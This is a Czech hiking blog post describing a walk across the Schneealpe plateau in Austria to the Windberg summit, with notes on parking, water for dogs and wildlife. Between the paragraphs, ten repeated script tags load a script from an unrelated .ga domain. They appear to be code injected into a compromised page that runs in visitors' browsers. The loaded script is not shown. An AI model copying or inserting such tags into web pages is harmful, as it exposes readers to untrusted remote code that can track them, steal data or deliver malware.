Horský masiv Schneealpe patří mezi blízké a dobře dostupné oblasti Alp, které vystupují nad horní hranici lesa. Masiv Schneealpe tvoří obrovská travnatá náhorní plošina, na které se mezi rašelinnými jezírky volně pasou koně a krávy a po svazích pobíhají svišti. Oblast není příliš turistická, i když jsme tu byli o víkendu, kromě hlavního vrcholu jsme potkali jen pár lidí.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Schneealpe je v podstatě skalnatý vápencový útes, na kterém se nachází náhorní plošina dostupná z různých stran, z některých vedou i široké zpevněné cesty. Z vlastní zkušenosti nedoporučuju spoléhat na výše položená parkoviště - ne vždy jsou otevřená. My jsme nakonec po neúspěšném pokusu dojet na výše položené parkoviště vyráželi z parkoviště západně od městečka Neuberg an der Mürz.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Cestička začala rychle stoupat a klikatila se lesem a přes vyschlé říční koryto, brzy začaly prosvítat výhledy. Na vodu v říčce jsme narazili až kousek pod horní hranicí lesa, kde byla i studánka, odtud se pak voda pravděpodobně propadala vápencem do podzemí. Nad hranicí lesa se otevřelo krásné travnaté sedlo obehnané skalními útesy, ze kterých nás sledovali kamzíci.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Na plošině Schneealpe není s vodou pro psy většinou problém, protože je podmáčená a je tu hodně jezírek. Plošina je protkaná různými cestami a pěšinkami a dají se po ní nachodit spousty kilometrů kolem volně se pasoucích stád, salaší i turistických chat.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Hlavní vrchol Windberg (1903 m) je bez problémů pro psy dostupný, cestičky vedou travnatým terénem a jen ke konci po kamenech, jsou odtud krásné výhledy na okolní masivy Hohe Veitsch, Raxalpe a Schneeberg. Z hlavního vrcholu vede hřebenovka směrem na Knopperwiese a odtud se dá vrátit zpět k sedlu cestičkou směrem na jihovýchod. Kolem cestičky se dá jednoduše vyšplhat na některý z menších vrcholů na okraji útesu, pokud budete mít také štěstí, můžete pod sebou v některém klidném a nepřístupném údolí zahlédnout kromě kamzíků i kozorohy :).

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>